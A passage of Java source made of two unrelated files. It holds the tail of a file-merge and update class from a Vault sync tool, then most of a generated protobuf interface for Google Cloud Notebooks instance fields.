MetaFileDocSource(tmpFile), r1, false)); diff = baseDoc.diff3(leftDoc, rightDoc); } // save the diff output try (Writer out = new OutputStreamWriter(FileUtils.openOutputStream(file), Constants.ENCODING)) { diff.write(new DiffWriter(out), false); } if (diff.hasConflicts()) { entry.conflict(file, baseFile, tmpFile); action = FileAction.CONFLICTED; } else { // make the tmp file the new base tmpFile.moveTo(baseFile); base.update(baseFile, true); action = FileAction.MERGED; } // and update the 'work' // check if MD5 changes and change action accordingly MD5 oldMd5 = work.getMd5(); work.update(file, true); if (oldMd5.equals(work.getMd5())) { action = FileAction.VOID; } // check if remote file provided a last modified if (remoteFile.lastModified() == 0) { if (work.getMd5().equals(base.getMd5())) { base.setDate(work.getDate()); } else { base.setDate(System.currentTimeMillis()); } } } catch (IOException e) { throw exception("Error during merge operation.", e); } return action; } private boolean getRemoteBinaryType(VaultFile remoteFile, VaultFileCopy copy) { // check if binary boolean remoteBT = MimeTypes.isBinary(remoteFile.getContentType()); if (copy != null && remoteBT != copy.isBinary()) { parent.getContext().printMessage(this, "Remote Binary type differs from actual data. Content Type: " + remoteFile.getContentType() + " Data is binary: " + copy.isBinary() + ". Using data type."); remoteBT = copy.isBinary(); } return remoteBT; } private FileAction mergeableWithRemote(VaultFile remoteFile) throws VltException { if (remoteFile.isDirectory() != file.isDirectory()) { return FileAction.CONFLICTED; } if (file.isDirectory()) { return FileAction.VOID; } MetaFile tmpFile = getTmpFile(); VltEntryInfo base = entry.base(); // get the remote file byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType()) ? null : LineOutputStream.LS_NATIVE; VaultFileCopy copy; try { File temp = tmpFile.openTempFile(); copy = VaultFileCopy.copy(remoteFile, temp, lineFeed); if (base == null) { tmpFile.closeTempFile(true); // if base is null, file was only added so check the work entry VltEntryInfo work = entry.work(); if (copy.getMd5().equals(work.getMd5())) { return FileAction.VOID; } else { return FileAction.CONFLICTED; } } // if tmp is equal to the base one, there was not update on the server if (copy.getMd5().equals(base.getMd5())) { tmpFile.closeTempFile(true); return FileAction.VOID; } // keep tmp file tmpFile.closeTempFile(false); } catch (IOException e) { throw exception("Error while copying files.", e); } // check if binary boolean remoteBT = getRemoteBinaryType(remoteFile, copy); if (remoteBT || MimeTypes.isBinary(base.getContentType())) { return FileAction.CONFLICTED; } MetaFile baseFile = getBaseFile(false); try (Reader r0 = baseFile.getReader(); Reader r1 = tmpFile.getReader()) { // do a 3-way diff between the base, the local and the remote one. // we currently do not use document sources, since we don't really have // a label to provide (like rev. num, etc). Document baseDoc = new Document(null, LineElementsFactory.create(new MetaFileDocSource(baseFile), r0, false)); Document leftDoc = new Document(null, LineElementsFactory.create(new FileDocumentSource(file), false, Constants.ENCODING)); Document rightDoc = new Document(null, LineElementsFactory.create(new MetaFileDocSource(tmpFile), r1, false)); DocumentDiff3 diff = baseDoc.diff3(leftDoc, rightDoc); if (diff.hasConflicts()) { return FileAction.CONFLICTED; } else { return FileAction.MERGED; } } catch (IOException e) { throw exception("Error during merge operation.", e); } } private void doRevert() throws VltException { if (entry.isDirectory()) { file.mkdir(); } else { try { getBaseFile(false).copyTo(getFile(), true); } catch (IOException e) { throw exception("Error while copying files.", e); } } VltEntryInfo base = entry.base(); entry.put(base.copyAs(VltEntryInfo.Type.WORK)); } private boolean equalsToRemote(VaultFile remoteFile) throws VltException { MetaFile tmpFile = getTmpFile(); // copy file byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType()) ? null : LineOutputStream.LS_NATIVE; VaultFileCopy copy; File temp = null; try { temp = tmpFile.openTempFile(); copy = VaultFileCopy.copy(remoteFile, temp, lineFeed); } catch (IOException e) { throw exception("Error while copying files.", e); } finally { if (tmpFile != null) { try { tmpFile.closeTempFile(true); } catch (IOException e) { // ignore } } } // if md5 is equal, no update VltEntryInfo base = entry.base(); return copy.getMd5().equals(base.getMd5()); } private FileAction doUpdate(VaultFile remoteFile, boolean baseOnly) throws VltException { FileAction action; VltEntryInfo base; if (entry == null || entry.base() == null) { // new entry action = FileAction.ADDED; entry = parent.getEntries().update(getName(), remoteFile.getAggregatePath(), remoteFile.getRepoRelPath()); base = entry.create(VltEntryInfo.Type.BASE); entry.put(base); } else { action = FileAction.UPDATED; base = entry.base(); // quick check if modified if (!base.checkModified(remoteFile)) { return FileAction.VOID; } } long lastMod = remoteFile.lastModified(); if (lastMod == 0) { lastMod = System.currentTimeMillis(); } base.setDate(lastMod); if (remoteFile.isDirectory()) { if (!baseOnly) { // ensure controlled // todo: this does not belong here if (entry.work() != null) { action = FileAction.VOID; } else { entry.put(base.copyAs(VltEntryInfo.Type.WORK)); } file.mkdir(); file.setLastModified(base.getDate()); VltDirectory dir = new VltDirectory(parent.getContext(), file); if (!dir.isControlled()) { dir.control(remoteFile.getPath(), remoteFile.getControllingAggregate().getPath()); action = FileAction.ADDED; } } } else { MetaFile baseFile = getBaseFile(true); // copy file byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType()) ? null : LineOutputStream.LS_NATIVE; VaultFileCopy copy; try { File temp = baseFile.openTempFile(); copy = VaultFileCopy.copy(remoteFile, temp, lineFeed); baseFile.closeTempFile(false); } catch (IOException e) { throw exception("Error while copying files.", e); } // if md5 is equal, no update if (copy.getMd5().equals(base.getMd5())) { action = FileAction.VOID; } if (action == FileAction.VOID && (base.getContentType() != null || remoteFile.getContentType() != null) && (base.getContentType() == null || !base.getContentType().equals(remoteFile.getContentType()))) { action = FileAction.UPDATED; } // update infos VltEntryInfo work = entry.work(); base.setContentType(remoteFile.getContentType()); base.setSize(copy.getLength()); base.setMd5(copy.getMd5()); if (!baseOnly) { // only copy if not equal if (work == null || !work.getMd5().equals(copy.getMd5()) || !getFile().exists()) { try { baseFile.copyTo(getFile(), true); entry.put(base.copyAs(VltEntryInfo.Type.WORK)); } catch (IOException e) { throw exception("Error while copying files.", e); } } } } return action; } private VltException exception(String msg, Throwable cause) { return parent.getContext().exception(getPath(), msg, cause); } private VltException error(String msg) { return parent.getContext().error(getPath(), msg); } //-----------------------------------------------------< DocumentSource >--- public String getLabel() { return getName(); } public String getLocation() { File cwd = parent.getContext().getCwd(); return PathUtil.getRelativeFilePath(cwd.getPath(), file.getPath()); } }
googleapis/google-cloud-java
35,534
java-notebooks/proto-google-cloud-notebooks-v1/src/main/java/com/google/cloud/notebooks/v1/InstanceOrBuilder.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/notebooks/v1/instance.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.notebooks.v1; public interface InstanceOrBuilder extends // @@protoc_insertion_point(interface_extends:google.cloud.notebooks.v1.Instance) com.google.protobuf.MessageOrBuilder { /** * * * <pre> * Output only. The name of this notebook instance. Format: * `projects/{project_id}/locations/{location}/instances/{instance_id}` * </pre> * * <code>string name = 1 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The name. */ java.lang.String getName(); /** * * * <pre> * Output only. The name of this notebook instance. Format: * `projects/{project_id}/locations/{location}/instances/{instance_id}` * </pre> * * <code>string name = 1 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The bytes for name. */ com.google.protobuf.ByteString getNameBytes(); /** * * * <pre> * Use a Compute Engine VM image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.VmImage vm_image = 2;</code> * * @return Whether the vmImage field is set. */ boolean hasVmImage(); /** * * * <pre> * Use a Compute Engine VM image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.VmImage vm_image = 2;</code> * * @return The vmImage. */ com.google.cloud.notebooks.v1.VmImage getVmImage(); /** * * * <pre> * Use a Compute Engine VM image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.VmImage vm_image = 2;</code> */ com.google.cloud.notebooks.v1.VmImageOrBuilder getVmImageOrBuilder(); /** * * * <pre> * Use a container image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.ContainerImage container_image = 3;</code> * * @return Whether the containerImage field is set. */ boolean hasContainerImage(); /** * * * <pre> * Use a container image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.ContainerImage container_image = 3;</code> * * @return The containerImage. */ com.google.cloud.notebooks.v1.ContainerImage getContainerImage(); /** * * * <pre> * Use a container image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.ContainerImage container_image = 3;</code> */ com.google.cloud.notebooks.v1.ContainerImageOrBuilder getContainerImageOrBuilder(); /** * * * <pre> * Path to a Bash script that automatically runs after a notebook instance * fully boots up. The path must be a URL or * Cloud Storage path (`gs://path-to-file/file-name`). * </pre> * * <code>string post_startup_script = 4;</code> * * @return The postStartupScript. */ java.lang.String getPostStartupScript(); /** * * * <pre> * Path to a Bash script that automatically runs after a notebook instance * fully boots up. The path must be a URL or * Cloud Storage path (`gs://path-to-file/file-name`). * </pre> * * <code>string post_startup_script = 4;</code> * * @return The bytes for postStartupScript. */ com.google.protobuf.ByteString getPostStartupScriptBytes(); /** * * * <pre> * Output only. The proxy endpoint that is used to access the Jupyter notebook. * </pre> * * <code>string proxy_uri = 5 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The proxyUri. */ java.lang.String getProxyUri(); /** * * * <pre> * Output only. The proxy endpoint that is used to access the Jupyter notebook. * </pre> * * <code>string proxy_uri = 5 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The bytes for proxyUri. */ com.google.protobuf.ByteString getProxyUriBytes(); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. * </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return A list containing the instanceOwners. */ java.util.List<java.lang.String> getInstanceOwnersList(); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. * </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The count of instanceOwners. */ int getInstanceOwnersCount(); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. * </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @param index The index of the element to return. * @return The instanceOwners at the given index. */ java.lang.String getInstanceOwners(int index); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. * </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @param index The index of the value to return. * @return The bytes of the instanceOwners at the given index. */ com.google.protobuf.ByteString getInstanceOwnersBytes(int index); /** * * * <pre> * The service account on this instance, giving access to other Google * Cloud services. * You can use any service account within the same project, but you * must have the service account user permission to use the instance. * * If not specified, the [Compute Engine default service * account](https://cloud.google.com/compute/docs/access/service-accounts#default_service_account) * is used. * </pre> * * <code>string service_account = 7;</code> * * @return The serviceAccount. */ java.lang.String getServiceAccount(); /** * * * <pre> * The service account on this instance, giving access to other Google * Cloud services. * You can use any service account within the same project, but you * must have the service account user permission to use the instance. * * If not specified, the [Compute Engine default service * account](https://cloud.google.com/compute/docs/access/service-accounts#default_service_account) * is used. * </pre> * * <code>string service_account = 7;</code> * * @return The bytes for serviceAccount. */ com.google.protobuf.ByteString getServiceAccountBytes(); /** * * * <pre> * Optional. The URIs of service account scopes to be included in * Compute Engine instances. * * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return A list containing the serviceAccountScopes. */ java.util.List<java.lang.String> getServiceAccountScopesList(); /** * * * <pre> * Optional. The URIs of service account scopes to be included in * Compute Engine instances. * * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The count of serviceAccountScopes. */ int getServiceAccountScopesCount(); /** * * * <pre> * Optional. The URIs of service account scopes to be included in * Compute Engine instances. * * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param index The index of the element to return. * @return The serviceAccountScopes at the given index. */ java.lang.String getServiceAccountScopes(int index); /** * * * <pre> * Optional. The URIs of service account scopes to be included in * Compute Engine instances. * * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param index The index of the value to return. * @return The bytes of the serviceAccountScopes at the given index. */ com.google.protobuf.ByteString getServiceAccountScopesBytes(int index); /** * * * <pre> * Required. The [Compute Engine machine * type](https://cloud.google.com/compute/docs/machine-types) of this * instance. * </pre> * * <code>string machine_type = 8 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The machineType. */ java.lang.String getMachineType(); /** * * * <pre> * Required. The [Compute Engine machine * type](https://cloud.google.com/compute/docs/machine-types) of this * instance. * </pre> * * <code>string machine_type = 8 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for machineType. */ com.google.protobuf.ByteString getMachineTypeBytes(); /** * * * <pre> * The hardware accelerator used on this instance. If you use * accelerators, make sure that your configuration has * [enough vCPUs and memory to support the `machine_type` you have * selected](https://cloud.google.com/compute/docs/gpus/#gpus-list). * </pre> * * <code>.google.cloud.notebooks.v1.Instance.AcceleratorConfig accelerator_config = 9;</code> * * @return Whether the acceleratorConfig field is set. */ boolean hasAcceleratorConfig(); /** * * * <pre> * The hardware accelerator used on this instance. If you use * accelerators, make sure that your configuration has * [enough vCPUs and memory to support the `machine_type` you have * selected](https://cloud.google.com/compute/docs/gpus/#gpus-list). * </pre> * * <code>.google.cloud.notebooks.v1.Instance.AcceleratorConfig accelerator_config = 9;</code> * * @return The acceleratorConfig. */ com.google.cloud.notebooks.v1.Instance.AcceleratorConfig getAcceleratorConfig(); /** * * * <pre> * The hardware accelerator used on this instance. If you use * accelerators, make sure that your configuration has * [enough vCPUs and memory to support the `machine_type` you have * selected](https://cloud.google.com/compute/docs/gpus/#gpus-list). * </pre> * * <code>.google.cloud.notebooks.v1.Instance.AcceleratorConfig accelerator_config = 9;</code> */ com.google.cloud.notebooks.v1.Instance.AcceleratorConfigOrBuilder getAcceleratorConfigOrBuilder(); /** * * * <pre> * Output only. The state of this instance. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.State state = 10 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for state. */ int getStateValue(); /** * * * <pre> * Output only. The state of this instance. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.State state = 10 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The state. */ com.google.cloud.notebooks.v1.Instance.State getState(); /** * * * <pre> * Whether the end user authorizes Google Cloud to install GPU driver * on this instance. * If this field is empty or set to false, the GPU driver won't be installed. * Only applicable to instances with GPUs. * </pre> * * <code>bool install_gpu_driver = 11;</code> * * @return The installGpuDriver. */ boolean getInstallGpuDriver(); /** * * * <pre> * Specify a custom Cloud Storage path where the GPU driver is stored. * If not specified, we'll automatically choose from official GPU drivers. * </pre> * * <code>string custom_gpu_driver_path = 12;</code> * * @return The customGpuDriverPath. */ java.lang.String getCustomGpuDriverPath(); /** * * * <pre> * Specify a custom Cloud Storage path where the GPU driver is stored. * If not specified, we'll automatically choose from official GPU drivers. * </pre> * * <code>string custom_gpu_driver_path = 12;</code> * * @return The bytes for customGpuDriverPath. */ com.google.protobuf.ByteString getCustomGpuDriverPathBytes(); /** * * * <pre> * Input only. The type of the boot disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType boot_disk_type = 13 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for bootDiskType. */ int getBootDiskTypeValue(); /** * * * <pre> * Input only. The type of the boot disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType boot_disk_type = 13 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The bootDiskType. */ com.google.cloud.notebooks.v1.Instance.DiskType getBootDiskType(); /** * * * <pre> * Input only. The size of the boot disk in GB attached to this instance, up to a maximum * of 64000 GB (64 TB). The minimum recommended value is 100 GB. If not * specified, this defaults to 100. * </pre> * * <code>int64 boot_disk_size_gb = 14 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The bootDiskSizeGb. */ long getBootDiskSizeGb(); /** * * * <pre> * Input only. The type of the data disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType data_disk_type = 25 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for dataDiskType. */ int getDataDiskTypeValue(); /** * * * <pre> * Input only. The type of the data disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType data_disk_type = 25 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The dataDiskType. */ com.google.cloud.notebooks.v1.Instance.DiskType getDataDiskType(); /** * * * <pre> * Input only. The size of the data disk in GB attached to this instance, up to a maximum * of 64000 GB (64 TB). You can choose the size of the data disk based on how * big your notebooks and data are. If not specified, this defaults to 100. * </pre> * * <code>int64 data_disk_size_gb = 26 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The dataDiskSizeGb. */ long getDataDiskSizeGb(); /** * * * <pre> * Input only. If true, the data disk will not be auto deleted when deleting the instance. * </pre> * * <code>bool no_remove_data_disk = 27 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The noRemoveDataDisk. */ boolean getNoRemoveDataDisk(); /** * * * <pre> * Input only. Disk encryption method used on the boot and data disks, defaults to GMEK. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskEncryption disk_encryption = 15 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for diskEncryption. */ int getDiskEncryptionValue(); /** * * * <pre> * Input only. Disk encryption method used on the boot and data disks, defaults to GMEK. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskEncryption disk_encryption = 15 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The diskEncryption. */ com.google.cloud.notebooks.v1.Instance.DiskEncryption getDiskEncryption(); /** * * * <pre> * Input only. The KMS key used to encrypt the disks, only applicable if disk_encryption * is CMEK. * Format: * `projects/{project_id}/locations/{location}/keyRings/{key_ring_id}/cryptoKeys/{key_id}` * * Learn more about [using your own encryption keys](/kms/docs/quickstart). * </pre> * * <code>string kms_key = 16 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The kmsKey. */ java.lang.String getKmsKey(); /** * * * <pre> * Input only. The KMS key used to encrypt the disks, only applicable if disk_encryption * is CMEK. * Format: * `projects/{project_id}/locations/{location}/keyRings/{key_ring_id}/cryptoKeys/{key_id}` * * Learn more about [using your own encryption keys](/kms/docs/quickstart). * </pre> * * <code>string kms_key = 16 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The bytes for kmsKey. */ com.google.protobuf.ByteString getKmsKeyBytes(); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ java.util.List<com.google.cloud.notebooks.v1.Instance.Disk> getDisksList(); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.cloud.notebooks.v1.Instance.Disk getDisks(int index); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ int getDisksCount(); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ java.util.List<? extends com.google.cloud.notebooks.v1.Instance.DiskOrBuilder> getDisksOrBuilderList(); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.cloud.notebooks.v1.Instance.DiskOrBuilder getDisksOrBuilder(int index); /** * * * <pre> * Optional. Shielded VM configuration. * [Images using supported Shielded VM * features](https://cloud.google.com/compute/docs/instances/modifying-shielded-vm). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig shielded_instance_config = 30 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the shieldedInstanceConfig field is set. */ boolean hasShieldedInstanceConfig(); /** * * * <pre> * Optional. Shielded VM configuration. * [Images using supported Shielded VM * features](https://cloud.google.com/compute/docs/instances/modifying-shielded-vm). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig shielded_instance_config = 30 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The shieldedInstanceConfig. */ com.google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig getShieldedInstanceConfig(); /** * * * <pre> * Optional. Shielded VM configuration. * [Images using supported Shielded VM * features](https://cloud.google.com/compute/docs/instances/modifying-shielded-vm). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig shielded_instance_config = 30 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ com.google.cloud.notebooks.v1.Instance.ShieldedInstanceConfigOrBuilder getShieldedInstanceConfigOrBuilder(); /** * * * <pre> * If true, no public IP will be assigned to this instance. * </pre> * * <code>bool no_public_ip = 17;</code> * * @return The noPublicIp. */ boolean getNoPublicIp(); /** * * * <pre> * If true, the notebook instance will not register with the proxy. * </pre> * * <code>bool no_proxy_access = 18;</code> * * @return The noProxyAccess. */ boolean getNoProxyAccess(); /** * * * <pre> * The name of the VPC that this instance is in. * Format: * `projects/{project_id}/global/networks/{network_id}` * </pre> * * <code>string network = 19;</code> * * @return The network. */ java.lang.String getNetwork(); /** * * * <pre> * The name of the VPC that this instance is in. * Format: * `projects/{project_id}/global/networks/{network_id}` * </pre> * * <code>string network = 19;</code> * * @return The bytes for network. */ com.google.protobuf.ByteString getNetworkBytes(); /** * * * <pre> * The name of the subnet that this instance is in. * Format: * `projects/{project_id}/regions/{region}/subnetworks/{subnetwork_id}` * </pre> * * <code>string subnet = 20;</code> * * @return The subnet. */ java.lang.String getSubnet(); /** * * * <pre> * The name of the subnet that this instance is in. * Format: * `projects/{project_id}/regions/{region}/subnetworks/{subnetwork_id}` * </pre> * * <code>string subnet = 20;</code> * * @return The bytes for subnet. */ com.google.protobuf.ByteString getSubnetBytes(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ int getLabelsCount(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ boolean containsLabels(java.lang.String key); /** Use {@link #getLabelsMap()} instead. */ @java.lang.Deprecated java.util.Map<java.lang.String, java.lang.String> getLabels(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ java.util.Map<java.lang.String, java.lang.String> getLabelsMap(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ /* nullable */ java.lang.String getLabelsOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ java.lang.String getLabelsOrThrow(java.lang.String key); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ int getMetadataCount(); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ boolean containsMetadata(java.lang.String key); /** Use {@link #getMetadataMap()} instead. */ @java.lang.Deprecated java.util.Map<java.lang.String, java.lang.String> getMetadata(); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ java.util.Map<java.lang.String, java.lang.String> getMetadataMap(); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ /* nullable */ java.lang.String getMetadataOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ java.lang.String getMetadataOrThrow(java.lang.String key); /** * * * <pre> * Optional. The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return A list containing the tags. */ java.util.List<java.lang.String> getTagsList(); /** * * * <pre> * Optional. The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The count of tags. */ int getTagsCount(); /** * * * <pre> * Optional. The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param index The index of the element to return. * @return The tags at the given index. */ java.lang.String getTags(int index); /** * * * <pre> * Optional. The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param index The index of the value to return. * @return The bytes of the tags at the given index. */ com.google.protobuf.ByteString getTagsBytes(int index); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ java.util.List<com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry> getUpgradeHistoryList(); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry getUpgradeHistory(int index); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ int getUpgradeHistoryCount(); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ java.util.List<? extends com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntryOrBuilder> getUpgradeHistoryOrBuilderList(); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntryOrBuilder getUpgradeHistoryOrBuilder( int index); /** * * * <pre> * Optional. The type of vNIC to be used on this interface. This may be gVNIC or * VirtioNet. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.NicType nic_type = 33 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The enum numeric value on the wire for nicType. */ int getNicTypeValue(); /** * * * <pre> * Optional. The type of vNIC to be used on this interface. This may be gVNIC or * VirtioNet. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.NicType nic_type = 33 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The nicType. */ com.google.cloud.notebooks.v1.Instance.NicType getNicType(); /** * * * <pre> * Optional. The optional reservation affinity. Setting this field will apply * the specified [Zonal Compute * Reservation](https://cloud.google.com/compute/docs/instances/reserving-zonal-resources) * to this notebook instance. * </pre> * * <code> * 